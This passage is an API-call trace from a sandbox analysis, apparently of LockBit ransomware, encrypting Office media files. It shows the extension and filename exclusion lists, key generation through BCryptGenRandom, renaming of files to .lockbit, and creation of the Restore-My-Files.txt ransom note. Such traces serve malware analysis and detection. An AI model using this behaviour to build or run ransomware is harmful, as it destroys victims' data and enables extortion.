NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.420] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.420] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.421] free (_Block=0x1fa2ed8) [0196.421] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0149887.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.421] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.421] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.421] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fc87200, ftCreationTime.dwHighDateTime=0x1bd7ec5, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3fc87200, ftLastWriteTime.dwHighDateTime=0x1bd7ec5, nFileSizeHigh=0x0, nFileSizeLow=0x2068, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157763.WMF", cAlternateFileName="")) returned 1 [0196.422] lstrcmpiW (lpString1=".", lpString2="J0157763.WMF") returned -1 [0196.422] lstrcmpiW (lpString1="..", lpString2="J0157763.WMF") returned -1 [0196.422] PathFindExtensionW (pszPath="J0157763.WMF") returned=".WMF" [0196.422] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.422] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.423] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.423] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157763.WMF") returned 1 [0196.423] lstrcmpiW (lpString1="ntldr", lpString2="J0157763.WMF") returned 1 [0196.423] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157763.WMF") returned 1 [0196.424] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157763.WMF") returned -1 [0196.424] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157763.WMF") returned -1 [0196.424] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157763.WMF") returned 1 [0196.424] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157763.WMF") returned -1 [0196.424] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.424] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF") returned=".WMF" [0196.424] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.424] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.424] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.425] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.425] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF.lockbit") returned 70 [0196.425] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0157763.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.427] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.427] malloc (_Size=0x40068) returned 0x3df0008 [0196.427] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8296) returned 1 [0196.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.427] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.427] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.428] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.428] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.432] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.432] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.432] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.434] free (_Block=0x1fa2ed8) [0196.434] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157763.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.434] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.434] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.434] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeffa900, ftCreationTime.dwHighDateTime=0x1bd94f9, ftLastAccessTime.dwLowDateTime=0xbd4548c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaeffa900, ftLastWriteTime.dwHighDateTime=0x1bd94f9, nFileSizeHigh=0x0, nFileSizeLow=0x1d94, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157995.WMF", cAlternateFileName="")) returned 1 [0196.434] lstrcmpiW (lpString1=".", lpString2="J0157995.WMF") returned -1 [0196.434] lstrcmpiW (lpString1="..", lpString2="J0157995.WMF") returned -1 [0196.434] PathFindExtensionW (pszPath="J0157995.WMF") returned=".WMF" [0196.434] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.434] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.435] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.435] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157995.WMF") returned 1 [0196.436] lstrcmpiW (lpString1="ntldr", lpString2="J0157995.WMF") returned 1 [0196.436] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157995.WMF") returned 1 [0196.436] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157995.WMF") returned -1 [0196.436] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157995.WMF") returned -1 [0196.436] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157995.WMF") returned 1 [0196.436] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157995.WMF") returned -1 [0196.436] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.436] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF") returned=".WMF" [0196.436] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.436] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.436] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.437] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.437] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF.lockbit") returned 70 [0196.437] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0157995.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.439] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.439] malloc (_Size=0x40068) returned 0x3df0008 [0196.439] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7572) returned 1 [0196.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.440] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.440] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.440] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.440] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.463] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.463] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.463] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0196.464] free (_Block=0x1fa2ed8) [0196.464] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0157995.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.464] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.465] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9ba3e00, ftCreationTime.dwHighDateTime=0x1bd94f9, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xb9ba3e00, ftLastWriteTime.dwHighDateTime=0x1bd94f9, nFileSizeHigh=0x0, nFileSizeLow=0x1426, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0158007.WMF", cAlternateFileName="")) returned 1 [0196.465] lstrcmpiW (lpString1=".", lpString2="J0158007.WMF") returned -1 [0196.465] lstrcmpiW (lpString1="..", lpString2="J0158007.WMF") returned -1 [0196.465] PathFindExtensionW (pszPath="J0158007.WMF") returned=".WMF" [0196.465] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.465] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.466] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.466] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0158007.WMF") returned 1 [0196.466] lstrcmpiW (lpString1="ntldr", lpString2="J0158007.WMF") returned 1 [0196.466] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0158007.WMF") returned 1 [0196.466] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0158007.WMF") returned -1 [0196.467] lstrcmpiW (lpString1="autorun.inf", lpString2="J0158007.WMF") returned -1 [0196.467] lstrcmpiW (lpString1="thumbs.db", lpString2="J0158007.WMF") returned 1 [0196.467] lstrcmpiW (lpString1="iconcache.db", lpString2="J0158007.WMF") returned -1 [0196.467] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.467] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0158007.WMF") returned=".WMF" [0196.467] lstrcmpiW (lpString1=".rar", lpString2=".WMF") 